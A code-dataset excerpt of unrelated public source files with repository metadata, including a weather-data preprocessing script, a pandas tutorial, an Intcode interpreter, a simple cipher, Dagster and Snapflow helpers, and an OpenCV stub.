if len(station_entries) == 0:
if VERBOSE_PRINT_MODE:
print("Empty Dataset, skipping this set time")
continue
state_start_time = time.time()
# loops through every STATION in the SAME STATE
for entry in station_entries:
valid_data = True
channel_rad_data = []
# loops through every CHANNEL in the SAME STATION
for file in channel_files:
if VERBOSE_PRINT_MODE:
print("Getting Radiance Channel " + file + " from " + entry["STATION_NAME"] + "...", end="")
with Dataset(file) as nc:
rad = nc.variables["Rad"][:]
dqf = nc.variables["DQF"][:]
rad, dqf = gcstools.crop_image(nc, rad, clat=float(entry["LATITUDE"]), clon=float(entry["LONGITUDE"]), dqf=dqf)
# make sure that at least 95% of the pixels are good
bad_vals_count = np.count_nonzero(dqf > 0)
if bad_vals_count > 500:
valid_data = False
break
channel_rad_data.append(rad)
if VERBOSE_PRINT_MODE:
print("Done")
if not valid_data:
continue
try:
actual_temp = int(entry["HOURLYDRYBULBTEMPF"])
sky_condition = entry["HOURLYSKYCONDITIONS"]
except:
continue # another data check, probably not needed
if VERBOSE_PRINT_MODE:
print("Getting Weather Values from " + entry["STATION_NAME"] + "...", end="")
# temp label is array of size 201 where -70 degrees F is index 0 and 130 degrees F is index 200, corresponding temp is marked with 1
temperature_label = np.zeros(201)
temp_index = actual_temp + 70
temperature_label[temp_index] = 1
filtered_sky_conditions = []
for word in sky_condition.split():
if "CLR" in word:
filtered_sky_conditions.append("CLR")
elif "FEW" in word:
filtered_sky_conditions.append("FEW")
elif "SCT" in word:
filtered_sky_conditions.append("SCT")
elif "BKN" in word:
filtered_sky_conditions.append("BKN")
elif "OVC" in word:
filtered_sky_conditions.append("OVC")
elif "VV" in word:
filtered_sky_conditions.append("VV")
if len(filtered_sky_conditions) == 0:
continue # data is weird, skip this one
# sky label is of size 6 where each index corresponds to the cloud conditions below
sky_condition_label = np.zeros(6)
sky_condition_to_check = filtered_sky_conditions[-1]
if sky_condition_to_check == "CLR": # clear
sky_condition_label[0] = 1
elif sky_condition_to_check == "FEW": # few clouds
sky_condition_label[1] = 1
elif sky_condition_to_check == "SCT": # scattered clouds
sky_condition_label[2] = 1
elif sky_condition_to_check == "BKN": # broken clouds
sky_condition_label[3] = 1
elif sky_condition_to_check == "OVC": # overcast
sky_condition_label[4] = 1
elif sky_condition_to_check == "VV": # obscured sky
sky_condition_label[5] = 1
# weather condition label is of size 4 where each index corresponds to the weather condition below
# note: more than 1 condition can be present
weather_condition_label = np.zeros(4)
weather_conditions = entry["HOURLYPRSENTWEATHERTYPE"]
if "DZ" in weather_conditions or "RA" in weather_conditions or "SH" in weather_conditions: # rain
weather_condition_label[0] = 1
if "SN" in weather_conditions: # snow
weather_condition_label[1] = 1
if "BR" in weather_conditions or "FG" in weather_conditions or "HZ" in weather_conditions: # fog / mist
weather_condition_label[2] = 1
if "TS" in weather_conditions: # thunderstorms
weather_condition_label[3] = 1
# this list represents all the weather labels for just ONE station
total_weather_labels = [temperature_label, sky_condition_label, weather_condition_label]
radiance_feature_input.append(channel_rad_data)
weather_label_output.append(total_weather_labels)
if VERBOSE_PRINT_MODE:
print("Done")
state_end_time = time.time()
if VERBOSE_PRINT_MODE:
print("Time Elapsed for Data Grabbing:", state_end_time - state_start_time)
print("-----------------------------")
return radiance_feature_input, weather_label_output
def increment_date(self):
self.__current_date = self.__current_date + timedelta(hours=1)
def get_all_states(self):
return self.__csv_states
def get_current_date(self):
return self.__current_date
def pickle_date(self):
pickle.dump(self.__current_date, open(DATE_PICKLE_NAME, "wb"))
# for debug purposes
def print_all_states(self):
print([f for f in listdir("WeatherData/") if isfile(join("WeatherData/", f))])
if __name__ == "__main__":
if PICKLE_MODE:
print("Using Pickled Date")
data_datetime = pickle.load(open(DATE_PICKLE_NAME, "rb"))
data_date = (data_datetime.year, data_datetime.month, data_datetime.day, data_datetime.hour)
else:
data_date = (2017, 2, 1, 0)
print("Using explicitly set date:", data_date)
data_retriever = DataManager(starting_date=data_date, channels=["C13", "C14", "C15", "C16"])
print(data_retriever.print_all_states())
while True:
radiance_features, weather_labels = data_retriever.get_formatted_data()
if radiance_features is not None and len(radiance_features) > 1:
radiance_features_nparray = np.array(radiance_features)
weather_labels_nparray = np.array(weather_labels)
save_path = str.format("NumpyDataFiles/{0}-{1}-{2}-{3}", *data_date)
np.save(save_path + "-rad_feature", radiance_features_nparray)
np.save(save_path + "-weather_label", weather_labels_nparray)
print("Successfully saved numpy data!")
data_retriever.increment_date()
data_datetime = data_retriever.get_current_date()
data_date = (data_datetime.year, data_datetime.month, data_datetime.day, data_datetime.hour)
data_retriever.pickle_date()
print("Successfully pickled current date")
print("Done with 1 hour iteration... moving on to ", data_date)
|
[
"darwin78913@gmail.com"
] |
darwin78913@gmail.com
|
f64233795111df760e19371a35a584413081cff7
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/class_def_attr-big-407.py
|
d189ce0fed43c4a777ecf1f02981982293253209
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
class A(object):
x:int = 1
class A2(object):
x:int = 1
x2:int = 1
class A3(object):
x:int = 1
x2:int = 1
x3:int = 1
class A4(object):
x:int = 1
x2:int = 1
x3:int = 1
x4:int = 1
class A5(object):
x:int = 1
x2:int = 1
x3:int = 1
x4:int = 1
x5:int = 1
class B(A):
def __init__(self: "B"):
pass
class B2(A):
def __init__(self: "B2"):
pass
class B3(A):
def __init__(self: "B3"):
pass
class B4(A):
def __init__(self: "B4"):
pass
class B5(A):
def __init__(self: "B5"):
pass
class C(B):
z:bool = True
class C2(B):
z:bool = True
z2:bool = True
class C3(B):
z:bool = True
z2:bool = True
z3:bool = True
class C4(B):
z:bool = True
z2:bool = True
z3:bool = True
z4:bool = True
class C5(B):
z:bool = True
z2:bool = True
z3:bool = True
z4:bool = True
z5:bool = True
a:A = None
a2:A = None
a3:A = $Literal
a4:A = None
a5:A = None
b:B = None
b2:B = None
b3:B = None
b4:B = None
b5:B = None
c:C = None
c2:C = None
c3:C = None
c4:C = None
c5:C = None
a = A()
a2 = A()
a3 = A()
a4 = A()
a5 = A()
b = B()
b2 = B()
b3 = B()
b4 = B()
b5 = B()
c = C()
c2 = C()
c3 = C()
c4 = C()
c5 = C()
a.x = 1
b.x = a.x
c.z = a.x == b.x
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
b8a72b235685444f3296526d4ae00737b1cc4183
|
cba5017525d30f84f4555bc0e10f1f83126f1d4a
|
/Solar/solarInfo/apps.py
|
2fcdc3f23dfa80d2de63c42f6ff03df6ca0ff227
|
[
"Apache-2.0"
] |
permissive
|
cycmay/SolarS
|
66e97a0de6b459f8bb05b03c2690d9852d92209a
|
284bcafa5da210e5c4200d19e46b3fa6bb5acb20
|
refs/heads/master
| 2020-05-23T18:09:09.760666
| 2019-05-24T15:42:25
| 2019-05-24T15:42:25
| 186,882,616
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 94
|
py
|
from django.apps import AppConfig
class SolarConfig(AppConfig):
name = 'solarInfo'
|
[
"1769614470@qq.com"
] |
1769614470@qq.com
|
b7c6a2da8d1c2ae74e8a0066ec371a381e31082e
|
cba3d1dd5b08a703c7e9e68464beb741eacfeb0d
|
/003_Pandas_tut.py
|
ca014206033cd06400a9a4ed2d444c451e86699b
|
[] |
no_license
|
Fizztech0/Tutorials
|
480b8973deee83ea19ad197761f5bf1e21c4a169
|
dff855b63834507783494543d0c8d3240d0bf145
|
refs/heads/main
| 2023-06-26T21:51:18.522576
| 2021-07-23T18:53:35
| 2021-07-23T18:53:35
| 388,511,432
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,046
|
py
|
# Dataframe is the Object type that Pandas allows to manipulate
import sys
sys.path.append("/Users/SafetyFirst/Library/Python/3.9/lib/python/site-packages")
# import as = dont have to type pandas everytime, but just pd
import pandas as pd
import numpy as np
# together with importing numpy these four lines of code allow for a wider pycharm terminal output when displaying
# dataframe content
desired_width=320
pd.set_option('display.width', desired_width)
np.set_printoptions(linewidth=desired_width)
pd.set_option('display.max_columns',13)
pd.set_option('display.max_rows', None)
df = pd.read_csv('003_pokemon_data.csv')
#print(df.head(5))
# Reading Data in Pandas
## Read Headers
#print(df.columns)
## Read each Column
#print(df['Name'][0:5])
#print(df.Name)
#print(df[['Name', 'HP']][0:5])
## Read each row
#print(df.iloc[1])
#for index, row in df.iterrows():
# print(index, row)
#for index, row in df.iterrows():
# print(index, row['Name'])
#print(df.loc[df['Type 1'] == "Fire"])
## Read a specific location (R, C)
#print(df.iloc[2, 1])
# Sorting/Describing Data
#print(df.describe())
## ascending sorting by name
#print(df.sort_values('Name'))
##descending sorting
#print(df.sort_values('Name', ascending=False))
## sorting through multiple columns, ascending [1 = True, 0 = False] so first column will be sorted ascending
## and the second descending
#print(df.sort_values(['Type 1', 'HP'], ascending=[1,0]))
##Making Chancges to the data
##Adding a column
#df['Total'] = df['HP'] + df['Attack'] + df['Defense'] + df['Sp. Atk'] + df['Sp. Def'] + df['Speed']
#print(df[0:13])
## when adding totals, doublecheck if numbers match!
## , means all columns
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#print(df)
## be careful with hardcoding numbers as tables change and that can screw everything up
## -> use variables (i.e. Pythons refractor instead of rename option)
## dropping columns
#print(df.drop(columns=['Legendary', 'Generation']))
## reordering data
## 1 just calling the columns you want
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#print(df[['Name', 'Total', 'HP']])
## 2
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#cols = list(df.columns)
#df = df[cols[0:4] + [cols[-1]] + cols[4:10]]
#print(df.head(5))
## saving to csv
## saving the modified file with the added total of all pokemon values and new sorting
##index=False, otherwise it would insert a indexing column at the front, which the df already has
## to csv, excel and TAB separated .txt
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#cols = list(df.columns)
#df = df[cols[0:4] + [cols[-1]] + cols[4:10]]
#df.to_csv('pokemon_data_modified.csv', index=False)
#df.to_excel('pokemon_data_modified.xlsx', index=False)
#df.to_csv('pokemon_data_modified.txt', index=False, sep='\t')
## Filtering data
## filtering by one spec
#print(df.loc[df['Type 1'] == 'Grass'])
## filtering by two specs
## in pandas we use "&" instead of the "and" we'd normally use
## equally "or" is
#new_df = df.loc[(df['Type 1'] == 'Grass') & (df['Type 2'] == 'Poison') & (df['HP'] > 70)]
#print(new_df)
## this will keep the old index, to get rid of it:
#new_df = new_df.reset_index(drop=True)
#select Mega
#new_df.reset_index(drop=True, inplace=True)
#inverse select for non-Mega
#new_df = df.loc[~df["Name"].str.contains('Mega')]
# REGEX segment ommitted
#filtering for either or
#print(df.loc[(df["Type 1"] == "Grass") | (df["Type 1"] == "Fire")])
## Conditional Changes
##changing strings
#df.loc[df["Type 1"] == "Fire", "Type 1"] = "Flamer"
## one condition to set the parameter of another column
#df.loc[df["Type 1"] == "Fire", ["Legendary", "Generation"]] = ["TEST 1", "TEST2"]
## Aggregate Statistics (Groupby)
df['Total'] = df.iloc[:, 4:10].sum(axis=1)
cols = list(df.columns)
df = df[cols[0:4] + [cols[-1]] + cols[4:12]]
#print(df.groupby(["Type 1"]).mean().sort_values("HP", ascending=False))
#print(df.groupby(["Type 1"]).sum())
#print(df.groupby(["Type 1"]).count())
df["count"] = 1
print(df.groupby(["Type 1", "Type 2"]).count()["count"])
#print(df)
|
[
"fizzad@gmail.com"
] |
fizzad@gmail.com
|
2b8a1159ab224c44e934263a6b9f5090c89352a0
|
47901d3483df111fe9b6f146691e58eecfa09c32
|
/13/intcode.py
|
6254b3853bf9397655b39b018240b3c0a8030a43
|
[] |
no_license
|
matus-pikuliak/advent_2019
|
1861ee4da7c01e038c80eeee1e03353f9907447f
|
67fcf18f66e53e886f945a5cdd7289b9439483db
|
refs/heads/master
| 2020-09-22T10:05:52.879745
| 2019-12-25T19:59:09
| 2019-12-25T19:59:09
| 225,149,977
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,095
|
py
|
class IntCode:
def __init__(self, memory):
self.mem = memory + [0] * 1000
self.pointer = 0
self.rel = 0
def run(self):
while True:
current = f'{self.mem[self.pointer]:05}'
instruction = current[-2:]
if instruction == '99':
break
modes = [
int(mode)
for mode
in current[2::-1]]
ops = []
for i in range(3):
adr = self.pointer + i + 1
if modes[i] == 0:
ops.append(self.mem[adr])
if modes[i] == 1:
ops.append(adr)
if modes[i] == 2:
ops.append(self.mem[adr] + self.rel)
if instruction == '01':
self.mem[ops[2]] = self.mem[ops[0]] + self.mem[ops[1]]
self.pointer += 4
if instruction == '02':
self.mem[ops[2]] = self.mem[ops[0]] * self.mem[ops[1]]
self.pointer += 4
if instruction == '03':
self.mem[ops[0]] = yield -999
yield
self.pointer += 2
if instruction == '04':
yield self.mem[ops[0]]
self.pointer += 2
if instruction == '05':
if self.mem[ops[0]] != 0:
self.pointer = self.mem[ops[1]]
else:
self.pointer += 3
if instruction == '06':
if self.mem[ops[0]] == 0:
self.pointer = self.mem[ops[1]]
else:
self.pointer += 3
if instruction == '07':
self.mem[ops[2]] = int(self.mem[ops[0]] < self.mem[ops[1]])
self.pointer += 4
if instruction == '08':
self.mem[ops[2]] = int(self.mem[ops[0]] == self.mem[ops[1]])
self.pointer += 4
if instruction == '09':
self.rel += self.mem[ops[0]]
self.pointer += 2
|
[
"matus.pikuliak@stuba.sk"
] |
matus.pikuliak@stuba.sk
|
674a79a4698a5728e4c44718119f31a8b7728fc8
|
11595170c7b0d51505dabb3e330df875a95093c5
|
/RPCHitAnalyzer/WorkDir/getFileName.py
|
1349eb408ec0595606e17aceead6bf65a29a5488
|
[] |
no_license
|
ggrenier/CMSusercode
|
61d7e7ee25f7a0a68f48011d8ad798e85ea8a8a8
|
a90320daf8be5d1c2b448256b3e3fb0d907eb051
|
refs/heads/master
| 2021-01-10T11:23:20.668795
| 2016-03-11T13:46:34
| 2016-03-11T13:46:34
| 53,138,550
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,112
|
py
|
#special entries for the dictionnary passed by :
#'directory' is the directory where to put file, if not found, it is set to '../Data/'
#'startName' is the file startName, if not found, this is set to 'SingleMu_upscope'
#'extension' is the file extension, if not found, this is set to '.root'
def generateFileName(paramsBydict):
filename='../Data/'
if ('directory' in paramsBydict):
filename=paramsBydict['directory']
if ('startName' in paramsBydict):
filename=filename+paramsBydict['startName']
else:
filename=filename+'SingleMu_upscope'
sortedKeys=sorted(paramsBydict)
for x in sortedKeys:
if (x not in ['directory','startName','nevents','extension']):
filename=filename+'_'+x+str(paramsBydict[x])
if ('nevents' in paramsBydict):
filename=filename+'_'+str(paramsBydict['nevents'])
if ('extension' in paramsBydict):
filename=filename+str(paramsBydict['extension'])
else:
filename=filename+'.root'
return filename
if __name__ == "__main__":
a=dict()
a['Pt']=60
a['zvtx']=30
a['etamin']=2.3
a['nevents']=1000
print generateFileName(a)
|
[
"grenier@ipnl.in2p3.fr"
] |
grenier@ipnl.in2p3.fr
|
b731f7bb0a905cd69ba11d5d934cc0ac33f22050
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/simple-cipher/7df478df5b6546c4b554e717f00f4c75.py
|
902cdef37788b91c86d3d3b606190688274c6913
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 1,338
|
py
|
'''cipher.py
created 6 Nov 2014
by @jestuber '''
import string
class Caesar(object):
"""docstring for Caesar"""
def __init__(self):
super(Caesar, self).__init__()
# self.arg = arg
def encode(self,plaintext):
return Cipher().encode(plaintext)
def decode(self,encoded):
return Cipher().decode(encoded)
class Cipher(object):
"""docstring for cipher"""
def __init__(self, key='d'):
super(Cipher, self).__init__()
self.key = key
self.shift = [string.lowercase.index(c) for c in key]
def encode(self,plaintext):
encoded = []
plaintext = plaintext.translate(None, string.punctuation+string.digits+' ').lower()
ishift = 0
for c in plaintext:
plainkey = string.lowercase.index(c)
newkey = plainkey + self.shift[ishift]
if newkey > 25:
newkey -= 26
encoded.append(string.lowercase[newkey])
ishift = 0 if ishift>=len(self.shift)-1 else ishift+1
return ''.join(encoded)
def decode(self,encoded):
plaintext = []
encoded = encoded.translate(None, string.punctuation+string.digits+' ').lower()
ishift = 0
for c in encoded:
enckey = string.lowercase.index(c)
newkey = enckey - self.shift[ishift]
if newkey < 0:
newkey += 26
plaintext.append(string.lowercase[newkey])
ishift = 0 if ishift>=len(self.shift)-1 else ishift+1
return ''.join(plaintext)
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
c74d3d817ada2bcf2794d7cffebfb2b3ccbf0e02
|
23a3c76882589d302b614da5f4be0fc626b4f3cd
|
/python_modules/dagster/dagster/api/snapshot_trigger.py
|
d9414b7c2318bcc7dc7ca624569ba3ba47f8ef8b
|
[
"Apache-2.0"
] |
permissive
|
DavidKatz-il/dagster
|
3641d04d387cdbe5535ae4f9726ce7dc1981a8c3
|
7c6d16eb8b3610a21020ecb479101db622d1535f
|
refs/heads/master
| 2022-12-20T13:08:36.462058
| 2020-09-14T18:12:12
| 2020-09-14T22:43:26
| 264,703,873
| 0
| 0
|
Apache-2.0
| 2020-06-16T09:49:00
| 2020-05-17T15:56:57
|
Python
|
UTF-8
|
Python
| false
| false
| 2,276
|
py
|
from dagster import check
from dagster.core.host_representation.external_data import (
ExternalExecutionParamsData,
ExternalExecutionParamsErrorData,
)
from dagster.core.host_representation.handle import RepositoryHandle
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.grpc.types import ExternalTriggeredExecutionArgs
from .utils import execute_unary_api_cli_command
def sync_get_external_trigger_execution_params(instance, repository_handle, trigger_name):
check.inst_param(repository_handle, "repository_handle", RepositoryHandle)
check.str_param(trigger_name, "trigger_name")
origin = repository_handle.get_origin()
return check.inst(
execute_unary_api_cli_command(
origin.executable_path,
"trigger_execution_params",
ExternalTriggeredExecutionArgs(
repository_origin=origin,
instance_ref=instance.get_ref(),
trigger_name=trigger_name,
),
),
(ExternalExecutionParamsData, ExternalExecutionParamsErrorData),
)
def sync_get_external_trigger_execution_params_ephemeral_grpc(
instance, repository_handle, trigger_name
):
from dagster.grpc.client import ephemeral_grpc_api_client
origin = repository_handle.get_origin()
with ephemeral_grpc_api_client(
LoadableTargetOrigin(executable_path=origin.executable_path)
) as api_client:
return sync_get_external_trigger_execution_params_grpc(
api_client, instance, repository_handle, trigger_name
)
def sync_get_external_trigger_execution_params_grpc(
api_client, instance, repository_handle, trigger_name
):
check.inst_param(repository_handle, "repository_handle", RepositoryHandle)
check.str_param(trigger_name, "trigger_name")
origin = repository_handle.get_origin()
return check.inst(
api_client.external_trigger_execution_params(
external_triggered_execution_args=ExternalTriggeredExecutionArgs(
repository_origin=origin,
instance_ref=instance.get_ref(),
trigger_name=trigger_name,
)
),
(ExternalExecutionParamsData, ExternalExecutionParamsErrorData),
)
|
[
"prha@elementl.com"
] |
prha@elementl.com
|
d8df3e108eb2a60fcac671fff7ece2212a4fd8a5
|
f0e11aeb7b5bd96c828cf39728eb2fa523f320df
|
/snapflow/cli/commands/generate.py
|
10a6882c60f47d5c9c2a9a96f8435d9b031bb621
|
[
"BSD-3-Clause"
] |
permissive
|
sathya-reddy-m/snapflow
|
7bc1fa7de7fd93b81e5b0538ba73ca68e9e109db
|
9e9e73f0d5a3d6b92f528ef1e2840ad92582502e
|
refs/heads/master
| 2023-05-01T05:14:08.479073
| 2021-05-21T00:14:56
| 2021-05-21T00:14:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,840
|
py
|
from __future__ import annotations
import os
from snapflow.cli.commands.base import SnapflowCommandBase
import sys
from contextlib import contextmanager
from importlib import import_module
from pathlib import Path
from types import ModuleType
from typing import List, Pattern
from cleo import Command
from snapflow.core.declarative.dataspace import DataspaceCfg
from snapflow.templates.generator import generate_template, insert_into_file
def strip_snapflow(s: str) -> str:
if s.startswith("snapflow_"):
return s[9:]
return s
class GenerateCommand(SnapflowCommandBase, Command):
"""
Generate new snapflow component
new
{type : Type of component to generate (module, dataspace, function, schema, or flow)}
{name : name of the component }
{--s|namespace : namespace of the component, defaults to current module namespace }
"""
def handle(self):
# self.import_current_snapflow_module()
type_ = self.argument("type")
name = self.argument("name")
namespace = self.option("namespace")
try:
getattr(self, f"handle_{type_}")(name, namespace)
except AttributeError:
raise ValueError(
f"Invalid type {type_}, must be one of (module, dataspace, flow, function, schema)"
)
def handle_module(self, name: str, namespace: str):
namespace = namespace or name
generate_template(
"module", namespace=namespace, name=name,
)
# generate_template("tests", py_module_name=py_module_name, module_name=name)
def handle_dataspace(self, name: str, namespace: str):
name = namespace or name
generate_template(
"dataspace", name=name,
)
# Move single file back down to root (cookiecutter doesn't support)
os.rename(f"{name}/snapflow.yml", "snapflow.yml")
def handle_function(self, name: str, namespace: str):
module = self.import_current_snapflow_module()
namespace = getattr(module, "namespace", None)
with self.chdir_relative("functions"):
generate_template("function", function_name=name, namespace=namespace)
self.insert_function_into_current_init_file(name)
def handle_schema(self, name: str, namespace: str):
namespace = strip_snapflow(namespace or self.get_current_snapflow_module_name())
with self.chdir_relative("schemas"):
generate_template("schema", schema_name=name, namespace=namespace)
self.insert_schema_into_current_init_file(name)
def handle_flow(self, name: str, namespace: str):
namespace = strip_snapflow(namespace or self.get_current_snapflow_module_name())
os.chdir(self.abs_path("flows"))
generate_template("flow", flow_name=name, namespace=namespace)
|
[
"kenvanharen@gmail.com"
] |
kenvanharen@gmail.com
|
93b50fe7cb62642f0337d0ffed643cb754d339e0
|
db1d9b55ac8e15182336d8fdbfcd5668d908fba6
|
/4_flask_restful_hello_world.py
|
db6e1ce37da625792a32e450fad8340a9a7356f2
|
[] |
no_license
|
sangameshBB/apis_with_flask
|
573694ac00bc9ddf443df977a119d678edc6e67f
|
81c088a048f1445b05ef151a74283778db1ad13d
|
refs/heads/master
| 2022-09-05T23:01:35.623221
| 2020-05-29T14:39:59
| 2020-05-29T14:39:59
| 267,879,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 289
|
py
|
from flask import Flask
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)
class HelloWorld(Resource):
def get(self):
return {'hello': 'world'}
api.add_resource(HelloWorld, '/')
if __name__ == '__main__':
app.run(debug=True)
|
[
"noreply@github.com"
] |
sangameshBB.noreply@github.com
|
30a67ecaa65f58462ea307f9e7814f41c0df1c1a
|
2aace9bb170363e181eb7520e93def25f38dbe5c
|
/build/idea-sandbox/system/python_stubs/cache/2e033ce6e3a2cdde5174895cadb3b406b2a013729dd641fee2cebd9f7ed97879/cv2/cv2/StereoMatcher.py
|
7ab88dbc440f1ef092cd9bd0c28536beb666920f
|
[] |
no_license
|
qkpqkp/PlagCheck
|
13cb66fd2b2caa2451690bb72a2634bdaa07f1e6
|
d229904674a5a6e46738179c7494488ca930045e
|
refs/heads/master
| 2023-05-28T15:06:08.723143
| 2021-06-09T05:36:34
| 2021-06-09T05:36:34
| 375,235,940
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,845
|
py
|
# encoding: utf-8
# module cv2.cv2
# from C:\Users\Doly\Anaconda3\lib\site-packages\cv2\cv2.cp37-win_amd64.pyd
# by generator 1.147
""" Python wrapper for OpenCV. """
# imports
import cv2.cv2 as # C:\Users\Doly\Anaconda3\lib\site-packages\cv2\cv2.cp37-win_amd64.pyd
import cv2.Error as Error # <module 'cv2.Error'>
import cv2.aruco as aruco # <module 'cv2.aruco'>
import cv2.bgsegm as bgsegm # <module 'cv2.bgsegm'>
import cv2.bioinspired as bioinspired # <module 'cv2.bioinspired'>
import cv2.cuda as cuda # <module 'cv2.cuda'>
import cv2.datasets as datasets # <module 'cv2.datasets'>
import cv2.detail as detail # <module 'cv2.detail'>
import cv2.dnn as dnn # <module 'cv2.dnn'>
import cv2.face as face # <module 'cv2.face'>
import cv2.fisheye as fisheye # <module 'cv2.fisheye'>
import cv2.flann as flann # <module 'cv2.flann'>
import cv2.ft as ft # <module 'cv2.ft'>
import cv2.hfs as hfs # <module 'cv2.hfs'>
import cv2.img_hash as img_hash # <module 'cv2.img_hash'>
import cv2.instr as instr # <module 'cv2.instr'>
import cv2.ipp as ipp # <module 'cv2.ipp'>
import cv2.kinfu as kinfu # <module 'cv2.kinfu'>
import cv2.line_descriptor as line_descriptor # <module 'cv2.line_descriptor'>
import cv2.linemod as linemod # <module 'cv2.linemod'>
import cv2.ml as ml # <module 'cv2.ml'>
import cv2.motempl as motempl # <module 'cv2.motempl'>
import cv2.multicalib as multicalib # <module 'cv2.multicalib'>
import cv2.ocl as ocl # <module 'cv2.ocl'>
import cv2.ogl as ogl # <module 'cv2.ogl'>
import cv2.omnidir as omnidir # <module 'cv2.omnidir'>
import cv2.optflow as optflow # <module 'cv2.optflow'>
import cv2.plot as plot # <module 'cv2.plot'>
import cv2.ppf_match_3d as ppf_match_3d # <module 'cv2.ppf_match_3d'>
import cv2.quality as quality # <module 'cv2.quality'>
import cv2.reg as reg # <module 'cv2.reg'>
import cv2.rgbd as rgbd # <module 'cv2.rgbd'>
import cv2.saliency as saliency # <module 'cv2.saliency'>
import cv2.samples as samples # <module 'cv2.samples'>
import cv2.structured_light as structured_light # <module 'cv2.structured_light'>
import cv2.text as text # <module 'cv2.text'>
import cv2.utils as utils # <module 'cv2.utils'>
import cv2.videoio_registry as videoio_registry # <module 'cv2.videoio_registry'>
import cv2.videostab as videostab # <module 'cv2.videostab'>
import cv2.xfeatures2d as xfeatures2d # <module 'cv2.xfeatures2d'>
import cv2.ximgproc as ximgproc # <module 'cv2.ximgproc'>
import cv2.xphoto as xphoto # <module 'cv2.xphoto'>
import cv2 as __cv2
class StereoMatcher(__cv2.Algorithm):
# no doc
def compute(self, left, right, disparity=None): # real signature unknown; restored from __doc__
"""
compute(left, right[, disparity]) -> disparity
. @brief Computes disparity map for the specified stereo pair
.
. @param left Left 8-bit single-channel image.
. @param right Right image of the same size and the same type as the left one.
. @param disparity Output disparity map. It has the same size as the input images. Some algorithms,
. like StereoBM or StereoSGBM compute 16-bit fixed-point disparity map (where each disparity value
. has 4 fractional bits), whereas other algorithms output 32-bit floating-point disparity map.
"""
pass
def getBlockSize(self): # real signature unknown; restored from __doc__
"""
getBlockSize() -> retval
.
"""
pass
def getDisp12MaxDiff(self): # real signature unknown; restored from __doc__
"""
getDisp12MaxDiff() -> retval
.
"""
pass
def getMinDisparity(self): # real signature unknown; restored from __doc__
"""
getMinDisparity() -> retval
.
"""
pass
def getNumDisparities(self): # real signature unknown; restored from __doc__
"""
getNumDisparities() -> retval
.
"""
pass
def getSpeckleRange(self): # real signature unknown; restored from __doc__
"""
getSpeckleRange() -> retval
.
"""
pass
def getSpeckleWindowSize(self): # real signature unknown; restored from __doc__
"""
getSpeckleWindowSize() -> retval
.
"""
pass
def setBlockSize(self, blockSize): # real signature unknown; restored from __doc__
"""
setBlockSize(blockSize) -> None
.
"""
pass
def setDisp12MaxDiff(self, disp12MaxDiff): # real signature unknown; restored from __doc__
"""
setDisp12MaxDiff(disp12MaxDiff) -> None
.
"""
pass
def setMinDisparity(self, minDisparity): # real signature unknown; restored from __doc__
"""
setMinDisparity(minDisparity) -> None
.
"""
pass
def setNumDisparities(self, numDisparities): # real signature unknown; restored from __doc__
"""
setNumDisparities(numDisparities) -> None
.
"""
pass
def setSpeckleRange(self, speckleRange): # real signature unknown; restored from __doc__
"""
setSpeckleRange(speckleRange) -> None
.
"""
pass
def setSpeckleWindowSize(self, speckleWindowSize): # real signature unknown; restored from __doc__
"""
setSpeckleWindowSize(speckleWindowSize) -> None
.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
|
[
"qinkunpeng2015@163.com"
] |
qinkunpeng2015@163.com
|
2e5db24847888b7364737d3edcf63f609a59d47b
|
65c001b5f572a6b0ca09dd9821016d628b745009
|
/frappe-bench/env/lib/python2.7/site-packages/cssutils/css/colors.py
|
0c4e4803b12d140e5337d66ce04c6406d01dfd2f
|
[
"MIT"
] |
permissive
|
ibrahmm22/library-management
|
666dffebdef1333db122c2a4a99286e7c174c518
|
b88a2129a5a2e96ce1f945ec8ba99a0b63b8c506
|
refs/heads/master
| 2022-10-30T17:53:01.238240
| 2020-06-11T18:36:41
| 2020-06-11T18:36:41
| 271,620,992
| 0
| 1
|
MIT
| 2022-10-23T05:04:57
| 2020-06-11T18:36:21
|
CSS
|
UTF-8
|
Python
| false
| false
| 6,669
|
py
|
# -*- coding: utf-8 -*-
"""
Built from something like this:
print [
(
row[2].text_content().strip(),
eval(row[4].text_content().strip())
)
for row in lxml.html.parse('http://www.w3.org/TR/css3-color/')
.xpath("//*[@class='colortable']//tr[position()>1]")
]
by Simon Sapin
"""
COLORS = {
'transparent': (0, 0, 0, 0.0),
'black': (0, 0, 0, 1.0),
